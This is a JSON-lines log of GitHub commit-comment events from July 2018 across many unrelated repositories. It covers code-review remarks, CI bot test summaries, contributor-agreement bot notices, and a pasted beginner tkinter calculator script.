{"id":"7998987395","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789451,"position":10,"line":10,"path":"FinalProject/src/main/webapp/WEB-INF/spring-security.xml","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T18:11:12Z","updated_at":"2018-07-21T18:11:12Z","author_association":"OWNER","body":"phần Cấu hình cách đường dẫn path"}},"created_at":"2018-07-21T18:11:12Z"}
{"id":"7998992188","type":"CommitCommentEvent","actor":{"login":"mweinelt"},"repo":{"name":"OpenSplit/vuejs-frontend"},"payload":{"comment":{"id":29789453,"position":4,"line":26,"path":"README.md","commit_id":"252a3a82cefce145b8541ef0d7228e02746b34b0","created_at":"2018-07-21T18:15:07Z","updated_at":"2018-07-21T18:15:07Z","author_association":"NONE","body":"wrong"}},"created_at":"2018-07-21T18:15:07Z"}
{"id":"7998992353","type":"CommitCommentEvent","actor":{"login":"biswesh456"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789454,"position":22,"line":24,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/PTAssistantPluginPreferences.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T18:15:13Z","updated_at":"2018-07-21T18:15:13Z","author_association":"COLLABORATOR","body":"HI @michaelzangl , how does adding final help? I know what it does and I have seen it getting used especially for state members but I never have understood its relevance."}},"created_at":"2018-07-21T18:15:13Z"}
{"id":"7998994841","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29789458,"position":null,"line":null,"path":null,"commit_id":"759e9c18ed941c1b385906c24359c5c1948ddd9c","created_at":"2018-07-21T18:17:09Z","updated_at":"2018-07-21T18:17:09Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Nigusse) - x86_64-MacOS-10.9-clang: OK (2940 of 2943 tests passed, 13 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 4 tests had: MTR small diffs.\n * 5 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-21T18:17:09Z"}
{"id":"7998995540","type":"CommitCommentEvent","actor":{"login":"titusfortner"},"repo":{"name":"watir/watir.github.io"},"payload":{"comment":{"id":29789460,"position":null,"line":null,"path":null,"commit_id":"2e0b017ab6593a81a52ba31f9230c1130e2b63a5","created_at":"2018-07-21T18:17:40Z","updated_at":"2018-07-21T18:17:40Z","author_association":"MEMBER","body":"Note: there are a bunch of typos and issues in this that were fixed in subsequent commits"}},"created_at":"2018-07-21T18:17:40Z"}
{"id":"7998997223","type":"CommitCommentEvent","actor":{"login":"kapijuos"},"repo":{"name":"kapijuos/Saltamontes"},"payload":{"comment":{"id":29789461,"position":1,"line":1,"path":"General info","commit_id":"e4dc754a730d43cbdd5b9e54e3d7bfa34681d106","created_at":"2018-07-21T18:19:03Z","updated_at":"2018-07-21T18:19:03Z","author_association":"OWNER","body":"hey que\r\n"}},"created_at":"2018-07-21T18:19:03Z"}
{"id":"7999000270","type":"CommitCommentEvent","actor":{"login":"tumGER"},"repo":{"name":"SunTheCourier/MemeROMHackUpdaterServer"},"payload":{"comment":{"id":29789473,"position":1,"line":1,"path":"test.bat","commit_id":"c2e3a32ebd8590ae907adc883e2443e8af1f0f33","created_at":"2018-07-21T18:21:25Z","updated_at":"2018-07-21T18:21:25Z","author_association":"NONE","body":"Might want to delete that lol"}},"created_at":"2018-07-21T18:21:25Z"}
{"id":"7999001068","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789475,"position":22,"line":24,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/PTAssistantPluginPreferences.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T18:22:06Z","updated_at":"2018-07-21T18:22:06Z","author_association":"COLLABORATOR","body":"A final field:\r\n* Can only be set once, either directly or in the constructor\r\n* Can never be changed\r\n\r\nOther readers of your code will immediately see that this field is intended not to be changed. If you use this consistently, the immediately see the non-final fields that manage the state of your object."}},"created_at":"2018-07-21T18:22:06Z"}
{"id":"7999011970","type":"CommitCommentEvent","actor":{"login":"arikff"},"repo":{"name":"arikff/my-first-calculator"},"payload":{"comment":{"id":29789497,"position":null,"line":null,"path":null,"commit_id":"14340da16a523c938e8dcb1b2cd248f500a75ecb","created_at":"2018-07-21T18:30:58Z","updated_at":"2018-07-21T18:30:58Z","author_association":"OWNER","body":"`from tkinter import *                                                                             # llibarry for tkinter that we use for do the GUI\r\nfrom tkinter import messagebox                                                                    # libary for  messagebox tkinter\r\n#for python 2 :import tkMessageBox\r\n################################################################################################################################################\r\n                                    ##              the main function of the gui                            ###\r\nglobal a                                                                                          # a, the first number\r\nglobal b                                                                                          # b, the second number\r\nglobal sign                                                                                       # sign,singn of the oprator\r\nglobal dot                                                                                        # sign,dot mean that we in float number\r\nglobal aftersign                                                                                  # sign,aftersign after sign we need to clar the screen\r\nsign=0;a=0;b=0;dot=0;aftersign=0\r\n\r\ndef MesT():\r\n    # function to print on screen message about the calculator\r\n    messagebox.showinfo(\"Say About\", \"written by Arik frankel from israel, in 2018, for fun\")\r\ndef client_exit():\r\n    # function to exit the program, exit from the calculator\r\n    exit()                                                                                         # close the gui and program\r\ndef point(E1):\r\n    # function to set decimal point\r\n    global dot\r\n    E1.insert(15, \".\")                                                                             # set what i want\r\n    dot=1\r\ndef cle(E1):\r\n    # function to claer the  screen\r\n    for i in range (20):\r\n        E1.delete(first=0, last=None)                                                              # delete what have befor\r\ndef CLR(E1):\r\n    # function to claer the screen and reset the all variables\r\n    cle(E1)\r\n    global a\r\n    global b\r\n    global sign\r\n    global op\r\n    global dot\r\n    global aftersign\r\n    a = 0;\r\n    b = 0;\r\n    sign = 0;\r\n    op = 0;\r\n    dot = 0;\r\n    aftersign = 0\r\ndef oprator(signumber, signp,E1):  # signumber=number of oprator,signp=sign of the oprator\r\n    # function to set and print the sign/oprator\r\n    global sign\r\n    global aftersign\r\n    global op  # op, the number of the oprator, 1=+,2=x,3=-,4=/\r\n    global dot\r\n    cle(E1)\r\n    E1.insert(0, signp)\r\n    sign = 1\r\n    aftersign = 1  # const and always happan after the sign is 1,\r\n    op = signumber\r\n    dot = 0  # const and always happan after the sign is 1,\r\ndef number(num,E1):\r\n    # function to set the number that was selected\r\n    # global a\r\n    global b\r\n    global aftersign\r\n    if (sign == 1):\r\n        if (aftersign == 1):\r\n            cle(E1)\r\n            aftersign = 2\r\n        if (dot == 0):\r\n            b = b * 10 + num\r\n        else:\r\n            b = b + (0.1 * num)\r\n    else:\r\n        global a\r\n        if (dot == 0):\r\n            a = a * 10 + num\r\n        else:\r\n            a = a + (0.1 * num)\r\n    E1.insert(15, num)  # set what i want\r\ndef equal(E1):\r\n    # function calculator (calcilat) the result\r\n    cle(E1)\r\n    if (op == 1):\r\n        E1.insert(0, a + b)  # set what i want\r\n    elif (op == 2):\r\n        E1.insert(0, a * b)  # set what i want\r\n    elif (op == 3):\r\n        E1.insert(0, a - b)  # set what i want\r\n    elif (op == 4):\r\n        E1.insert(0, a / b)  # set what i want\r\n################################################################################################################################################\r\n                                  ##              Building the gui                            ###\r\nclass window(Frame):\r\n\r\n    def __init__(self, master=None):                                                               # this the function that call in time that the obj born\r\n        Frame.__init__(self,master)\r\n        self.master=master\r\n        self.init_window()\r\n\r\n    def init_window(self):\r\n        self.master.title(\"Calculator\")                                                           # main title\r\n        self.pack(fill=BOTH,expand=1)\r\n        # creating a menu instance\r\n        menu = Menu(self.master)\r\n        self.master.config(menu=menu)                                                             # create main menu\r\n        # create the file object)\r\n        file = Menu(menu)\r\n        file.add_command(label=\"Exit\", command=client_exit)\r\n        file.add_command(label=\"About\",command=MesT)                                              # add command\r\n        # added \"file\" to our menu\r\n        menu.add_cascade(label=\"Menu\", menu=file)                                                 # add cascade, must for create menu\r\n        # create the file object\r\n        edit = Menu(menu)\r\n        E1 = Entry(root)\r\n        E1.place(x=80, y=50)\r\n        B1 = Button(self, text=\"-\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda:oprator(3,\"-\",E1))\r\n        B1.place(x=280, y=250)\r\n        B2 = Button(self, text=\"+\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda:oprator(1,\"+\",E1))\r\n        B2.place(x=280, y=300)\r\n        B3 = Button(self, text=\"X\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda:oprator(2,\"X\",E1))\r\n        B3.place(x=280, y=200)\r\n        B4 = Button(self, text=\"/\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda:oprator(4,\"/\",E1))\r\n        B4.place(x=280, y=150)\r\n        B5 = Button(self, text=\"=\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: equal(E1))\r\n        B5.place(x=200, y=300)\r\n        B6 = Button(self, text=\"3\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(3,E1))\r\n        B6.place(x=200, y=250)\r\n        B7 = Button(self, text=\"6\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(6,E1))\r\n        B7.place(x=200, y=200)\r\n        B8 = Button(self, text=\"9\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(9,E1))\r\n        B8.place(x=200, y=150)\r\n        B9 = Button(self, text=\"8\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(8,E1))\r\n        B9.place(x=140, y=150)\r\n        B10 = Button(self, text=\"5\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(5,E1))\r\n        B10.place(x=140, y=200)\r\n        B11 = Button(self, text=\"2\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(2,E1))\r\n        B11.place(x=140, y=250)\r\n        B12 = Button(self, text=\".\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda:point(E1))\r\n        B12.place(x=140, y=300)\r\n        B13 = Button(self, text=\"7\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(7,E1))\r\n        B13.place(x=80, y=150)\r\n        B14 = Button(self, text=\"4\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(4,E1))\r\n        B14.place(x=80, y=200)\r\n        B15 = Button(self, text=\"1\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(1,E1))\r\n        B15.place(x=80, y=250)\r\n        B16 = Button(self, text=\"0\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: number(0,E1))\r\n        B16.place(x=80, y=300)\r\n        B17 = Button(self, text=\"C\", width=5, font=('Helvetica', '10'), fg=\"blue\", command=lambda: CLR(E1))\r\n        B17.place(x=80, y=100)\r\n###########################################################################################################################################\r\n                      ##                    main program                                        ###\r\nroot=Tk()                                                                                         # do the window/GUI\r\nroot.geometry(\"350x350\")                                                                          # define the window size\r\napp=window(root)                                                                                  # Activates the window function\r\nroot.mainloop()                                                                                   # Activates  the mainloop\r\n`"}},"created_at":"2018-07-21T18:30:58Z"}
{"id":"7999016003","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29789505,"position":null,"line":null,"path":null,"commit_id":"28defc5a048a2829d0b58a789318a7b27674697e","created_at":"2018-07-21T18:34:12Z","updated_at":"2018-07-21T18:34:12Z","author_association":"CONTRIBUTOR","body":"I'm unable to check this branch out locally because a whole bunch of static files got added here. Is there a way to undo this?"}},"created_at":"2018-07-21T18:34:12Z"}
{"id":"7999017324","type":"CommitCommentEvent","actor":{"login":"depeele"},"repo":{"name":"Polymer/lit-html"},"payload":{"comment":{"id":29789510,"position":null,"line":null,"path":null,"commit_id":"8697b40f67e1275defaf57648ed6bec9fd0e0160","created_at":"2018-07-21T18:35:16Z","updated_at":"2018-07-21T18:35:16Z","author_association":"NONE","body":"This change results in contained custom elements never becoming fully adopted even when this element is finally adopted. This means that contained elements will always be matched by the `:unresolved` CSS pseudo-property.\r\n\r\nIn https://codepen.io/depeele/pen/QBdZyo using `lit-html:v0.10.0` the contained `test-item` is considered resolved in the final document.\r\n\r\nIn https://codepen.io/depeele/pen/PBWyzB using `lit-html:v0.10.1` but otherwise the same code,  `test-item` is *not* considered resolved in the final document."}},"created_at":"2018-07-21T18:35:16Z"}
{"id":"7999018135","type":"CommitCommentEvent","actor":{"login":"NumbSkullq1"},"repo":{"name":"NumbSkullq1/memory-game"},"payload":{"comment":{"id":29789513,"position":null,"line":null,"path":null,"commit_id":"f8f795ff60e908280aee3a905168e744909b3712","created_at":"2018-07-21T18:35:55Z","updated_at":"2018-07-21T18:35:55Z","author_association":"OWNER","body":"New theme added nothing complex "}},"created_at":"2018-07-21T18:35:55Z"}
{"id":"7999019100","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29789515,"position":null,"line":null,"path":null,"commit_id":"d4d2c572d5be280e0fd21ebe1c4cdb6ec253b046","created_at":"2018-07-21T18:36:44Z","updated_at":"2018-07-21T18:36:44Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-68](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-68).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-68-tre.pantheonsite.io/)"}},"created_at":"2018-07-21T18:36:44Z"}
{"id":"7999019656","type":"CommitCommentEvent","actor":{"login":"lucacomoretto"},"repo":{"name":"plamenpasliev/StrongComponentsPaslievComoretto"},"payload":{"comment":{"id":29789516,"position":null,"line":null,"path":null,"commit_id":"e96815f3a265b8a93d265d7d4e3b0570b134bf9d","created_at":"2018-07-21T18:37:13Z","updated_at":"2018-07-21T18:37:13Z","author_association":"COLLABORATOR","body":"Memory and time allocation"}},"created_at":"2018-07-21T18:37:13Z"}
{"id":"7999021335","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29789519,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-21T18:38:32Z","updated_at":"2018-07-21T18:38:32Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-21T18:38:32Z"}
{"id":"7999021443","type":"CommitCommentEvent","actor":{"login":"EliseNassif"},"repo":{"name":"DITEP/DITEP.github.io"},"payload":{"comment":{"id":29789520,"position":null,"line":null,"path":null,"commit_id":"fe5564981fa224214fbfbe84277933edf0eff36b","created_at":"2018-07-21T18:38:37Z","updated_at":"2018-07-21T18:38:37Z","author_association":"NONE","body":"![photo id elise nassif](https://user-images.githubusercontent.com/41521946/43039079-e6222fb2-8d25-11e8-8e40-586058e75f67.jpg)\r\n"}},"created_at":"2018-07-21T18:38:37Z"}
{"id":"7999022370","type":"CommitCommentEvent","actor":{"login":"heeelp5"},"repo":{"name":"dlrudie/Snip"},"payload":{"comment":{"id":29789521,"position":null,"line":null,"path":null,"commit_id":"f56ee27fceb30858c38102a224277c27611c9ebb","created_at":"2018-07-21T18:39:22Z","updated_at":"2018-07-21T18:39:22Z","author_association":"NONE","body":"clone it through using git\r\n"}},"created_at":"2018-07-21T18:39:22Z"}
{"id":"7999022444","type":"CommitCommentEvent","actor":{"login":"jvallejoa"},"repo":{"name":"jvallejoa/ProgrammingAssignment2"},"payload":{"comment":{"id":29789522,"position":null,"line":null,"path":null,"commit_id":"6e9ff14ebe399ca09de4b3b02a6ef846ad909ebc","created_at":"2018-07-21T18:39:25Z","updated_at":"2018-07-21T18:39:25Z","author_association":"OWNER","body":"# As matrix inversion is usually costly computation it would be useful to make a fast way to enhance the calculation\r\n# The following program cache the inverse of a matrix rather than compute it repeatedly \r\n# This function iterates the calculation of inverse matrixes\r\n# However, it first checks to see if the inverse has already been calculated. \r\n# If so, it gets the mean from the cache and skips the computation.\r\n# Otherwise, it calculates the mean of the data and sets the value of the inverse in the cache via the solve function."}},"created_at":"2018-07-21T18:39:25Z"}
{"id":"7999024211","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29789523,"position":null,"line":null,"path":null,"commit_id":"759e9c18ed941c1b385906c24359c5c1948ddd9c","created_at":"2018-07-21T18:40:47Z","updated_at":"2018-07-21T18:40:47Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2980 of 2983 tests passed, 16 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 4 tests had: MTR small diffs.\n * 2 tests had: Table small diffs.\n * 5 tests had: ESO small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 640\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-21T18:40:47Z"}
{"id":"7999024378","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29789524,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-21T18:40:55Z","updated_at":"2018-07-21T18:40:55Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-21T18:40:55Z"}
{"id":"7999027599","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29789536,"position":17,"line":547,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/GuiSkins.java","commit_id":"bbff6ceaabab24d022f9e2b1ee4cb0ab18434407","created_at":"2018-07-21T18:43:25Z","updated_at":"2018-07-21T18:43:25Z","author_association":"MEMBER","body":"Maybe if you're a gigantic api who wants to allow x-infinity additions, but this can be done by simply passing an interface object in and calling it from inside. I'd much prefer that, actually, and had a change to hide this all inside SkinServer but felt it wasn't worth the extra code."}},"created_at":"2018-07-21T18:43:25Z"}
{"id":"7999029095","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29789539,"position":17,"line":547,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/GuiSkins.java","commit_id":"bbff6ceaabab24d022f9e2b1ee4cb0ab18434407","created_at":"2018-07-21T18:44:36Z","updated_at":"2018-07-21T18:44:36Z","author_association":"MEMBER","body":"a lambda or method reference IS a interface object."}},"created_at":"2018-07-21T18:44:36Z"}
{"id":"7999029351","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29789542,"position":14,"line":14,"path":"src/hdskins/java/com/voxelmodpack/hdskins/util/Optionals.java","commit_id":"dfd3c6f2ea50039ee83042bdfd95d65d88e92f7a","created_at":"2018-07-21T18:44:48Z","updated_at":"2018-07-21T18:44:48Z","author_association":"MEMBER","body":"Well, you won't see me using that any time soon. :)"}},"created_at":"2018-07-21T18:44:48Z"}
{"id":"7999030644","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29789551,"position":17,"line":547,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/GuiSkins.java","commit_id":"bbff6ceaabab24d022f9e2b1ee4cb0ab18434407","created_at":"2018-07-21T18:45:52Z","updated_at":"2018-07-21T18:45:52Z","author_association":"MEMBER","body":"Not quite: lambas only llow one method.\r\n\r\nWhat I'm talking about is this:\r\n\r\n```\r\nserver.uploadSkin(mc.getSession(), path, textureType, getMetadata(), this);\r\n```"}},"created_at":"2018-07-21T18:45:52Z"}
{"id":"7999031355","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29789559,"position":null,"line":null,"path":null,"commit_id":"759e9c18ed941c1b385906c24359c5c1948ddd9c","created_at":"2018-07-21T18:46:23Z","updated_at":"2018-07-21T18:46:23Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T18:46:23Z"}
{"id":"7999031393","type":"CommitCommentEvent","actor":{"login":"terpro"},"repo":{"name":"terpro/riderapp"},"payload":{"comment":{"id":29789560,"position":null,"line":null,"path":null,"commit_id":"40a0f85ad48ec847339dc8e5f55c37c3e237eb86","created_at":"2018-07-21T18:46:25Z","updated_at":"2018-07-21T18:46:25Z","author_association":"OWNER","body":"The version entered on this commit is incorrect. It's actually version 1.0.567b."}},"created_at":"2018-07-21T18:46:25Z"}
{"id":"7999031710","type":"CommitCommentEvent","actor":{"login":"terpro"},"repo":{"name":"terpro/riderapp"},"payload":{"comment":{"id":29789561,"position":null,"line":null,"path":null,"commit_id":"393b18c8b14859991468d296e4f191f7979dacff","created_at":"2018-07-21T18:46:40Z","updated_at":"2018-07-21T18:46:40Z","author_association":"OWNER","body":"The version entered on this commit is incorrect. It's actually version 1.0.567c."}},"created_at":"2018-07-21T18:46:40Z"}
{"id":"7999031903","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29789565,"position":17,"line":547,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/GuiSkins.java","commit_id":"bbff6ceaabab24d022f9e2b1ee4cb0ab18434407","created_at":"2018-07-21T18:46:50Z","updated_at":"2018-07-21T18:46:50Z","author_association":"MEMBER","body":"because lambdas should only *do* one thing. and also stateless."}},"created_at":"2018-07-21T18:46:50Z"}
{"id":"7999032692","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29789570,"position":17,"line":547,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/GuiSkins.java","commit_id":"bbff6ceaabab24d022f9e2b1ee4cb0ab18434407","created_at":"2018-07-21T18:47:22Z","updated_at":"2018-07-21T18:47:22Z","author_association":"MEMBER","body":"Inside SkinServer you can either have the `then`s or pass it into the method that generates the result and execute each callback directly from there."}},"created_at":"2018-07-21T18:47:22Z"}
{"id":"7999033635","type":"CommitCommentEvent","actor":{"login":"peacecwz"},"repo":{"name":"okandavut/MaviNokta"},"payload":{"comment":{"id":29789571,"position":12,"line":12,"path":"MaviNokta.Entities/Users/ProfilePicturesEntity.cs","commit_id":"3869c1801e43918c8b0d7ea83028fd3486b78f78","created_at":"2018-07-21T18:48:07Z","updated_at":"2018-07-21T18:48:07Z","author_association":"COLLABORATOR","body":"Burada key eklemeye gerek yok default olarak Id adında bir key oluşuyor BaseEntity içinde"}},"created_at":"2018-07-21T18:48:07Z"}
{"id":"7999038976","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29789575,"position":null,"line":null,"path":null,"commit_id":"4473871d1fb070d0860a46bb4362282c00943455","created_at":"2018-07-21T18:52:22Z","updated_at":"2018-07-21T18:52:22Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T18:52:22Z"}
{"id":"7999044236","type":"CommitCommentEvent","actor":{"login":"D3AH"},"repo":{"name":"RedCiudadana/ConoceTuEscuela"},"payload":{"comment":{"id":29789580,"position":null,"line":null,"path":null,"commit_id":"3344b52dec4f3cd791242f74a5d9c3d0204cbdf0","created_at":"2018-07-21T18:56:47Z","updated_at":"2018-07-21T18:56:47Z","author_association":"CONTRIBUTOR","body":"close #2 "}},"created_at":"2018-07-21T18:56:47Z"}
{"id":"7999046473","type":"CommitCommentEvent","actor":{"login":"lacabra"},"repo":{"name":"enigmampc/surface"},"payload":{"comment":{"id":29789590,"position":5,"line":2,"path":"src/surface/config.json","commit_id":"1deb3e5abb01907a141a67f3d940193099beb9ef","created_at":"2018-07-21T18:58:31Z","updated_at":"2018-07-21T18:58:31Z","author_association":"MEMBER","body":"@fredfortier: FYI, this keeps happening, and breaks the integration in `enigma-docker-network`. I've just fixed in commit c296fbcd892d4f67e3776003a9349bad6c1b3cb4 (Cc: @elichai)"}},"created_at":"2018-07-21T18:58:31Z"}
{"id":"7999046618","type":"CommitCommentEvent","actor":{"login":"allenjwelch"},"repo":{"name":"allenjwelch/cicerowned_project"},"payload":{"comment":{"id":29789591,"position":null,"line":null,"path":null,"commit_id":"a2838ae86c5e252ff68efe0b7dafa9efc502ad90","created_at":"2018-07-21T18:58:38Z","updated_at":"2018-07-21T18:58:38Z","author_association":"OWNER","body":"Last working Heroku Deply (before ChatRoom component added)"}},"created_at":"2018-07-21T18:58:38Z"}
{"id":"7999048280","type":"CommitCommentEvent","actor":{"login":"deviun"},"repo":{"name":"deviun/action-flow"},"payload":{"comment":{"id":29789598,"position":6,"line":4,"path":".gitignore","commit_id":"a4af76b9db752772e8b15d2443760c353742c433","created_at":"2018-07-21T19:00:04Z","updated_at":"2018-07-21T19:00:04Z","author_association":"OWNER","body":"Но это не помогло =D"}},"created_at":"2018-07-21T19:00:04Z"}
{"id":"7999050882","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29789616,"position":null,"line":null,"path":null,"commit_id":"c18cbf5a8f6ee8011877206d55afb7d2d1971efc","created_at":"2018-07-21T19:01:57Z","updated_at":"2018-07-21T19:01:57Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T19:01:57Z"}
